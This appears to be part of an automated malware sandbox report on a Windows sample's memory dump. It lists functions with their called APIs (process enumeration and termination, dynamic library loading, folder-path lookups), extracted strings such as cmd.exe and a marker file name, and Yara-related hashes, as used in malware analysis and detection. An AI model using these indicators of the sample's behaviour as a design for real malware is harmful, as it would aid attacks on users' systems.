                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                      • String ID: cmd.exe
                                                                                                                                                                                                      • API String ID: 2696918072-723907552
                                                                                                                                                                                                      • Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                                                                                                                      • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F310, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll,750D3E10), ref: 0040F338
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                                                      • API String ID: 2574300362-2555811374
                                                                                                                                                                                                      • Opcode ID: b7a25bb7fb9543e258ddabd47f6d76af18241296cdd8ce7e2f0390cd5c73f1c1
                                                                                                                                                                                                      • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7a25bb7fb9543e258ddabd47f6d76af18241296cdd8ce7e2f0390cd5c73f1c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00463350, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _strncmp
                                                                                                                                                                                                      • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                                                      • API String ID: 909875538-2908105608
                                                                                                                                                                                                      • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                      • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004573F0, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                                                                                      • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                                                                                      • API String ID: 1302938615-3129329331
                                                                                                                                                                                                      • Opcode ID: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                                                                                                                                                                                                      • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00425141, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 00425141
                                                                                                                                                                                                        • Part of subcall function 00427D6C: RtlEncodePointer.NTDLL(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                                                                                                                        • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                                                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                                                                                                                      • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                                                                                                                      • __mtterm.LIBCMT ref: 0042514F
                                                                                                                                                                                                        • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                                                                                                                        • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                                                                                                                        • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00425174
                                                                                                                                                                                                      • __initptd.LIBCMT ref: 00425196
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3567560977-0
                                                                                                                                                                                                      • Opcode ID: e4f597f782e3b4b52baab141e34533d3b2cf4c526fa64c122f399e87149032cb
                                                                                                                                                                                                      • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4f597f782e3b4b52baab141e34533d3b2cf4c526fa64c122f399e87149032cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004253AE, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042594A
                                                                                                                                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                                                                        • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                                                                      • _free.LIBCMT ref: 00425970
                                                                                                                                                                                                        • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                                                                                                                                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00425989
                                                                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                                                                                                                      • _free.LIBCMT ref: 004259C4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 626533743-0
                                                                                                                                                                                                      • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                                                                      • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004506A0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                                                                                                                                      • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                                                      • API String ID: 601868998-2416195885
                                                                                                                                                                                                      • Opcode ID: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                                                                                                                                                                                                      • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004416EB, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00441734
                                                                                                                                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                      • _strnlen.LIBCMT ref: 004417BF
                                                                                                                                                                                                      • __lock.LIBCMT ref: 004417D0
                                                                                                                                                                                                      • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168648987-0
                                                                                                                                                                                                      • Opcode ID: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                                                                                                                                                                                                      • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0043B6FF, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0043B70B
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                                                                      • _free.LIBCMT ref: 0043B71E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                                                      • Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                                                                                                                                                                                                      • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041F070, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1380987712-0
                                                                                                                                                                                                      • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                      • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041E500, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1380987712-0
                                                                                                                                                                                                      • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                      • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00414160, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                                                                                                                                                                                                      • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00425341, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcsnlen
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 3628947076-3372436214
                                                                                                                                                                                                      • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                      • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C5C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • UuidCreate.RPCRT4(?), ref: 0040C5DA
                                                                                                                                                                                                      • UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
                                                                                                                                                                                                      • RpcStringFreeA.RPCRT4(00000000), ref: 0040C640
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: StringUuid$CreateFree
                                                                                                                                                                                                      • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                                                      • API String ID: 3044360575-2335240114
                                                                                                                                                                                                      • Opcode ID: a19a6412c6c33fa454dd3909279d5ce51fc032101351a635a97ce88cdf0871cf
                                                                                                                                                                                                      • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a19a6412c6c33fa454dd3909279d5ce51fc032101351a635a97ce88cdf0871cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C470, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$AppendFolder
                                                                                                                                                                                                      • String ID: bowsakkdestx.txt
                                                                                                                                                                                                      • API String ID: 29327785-2616962270
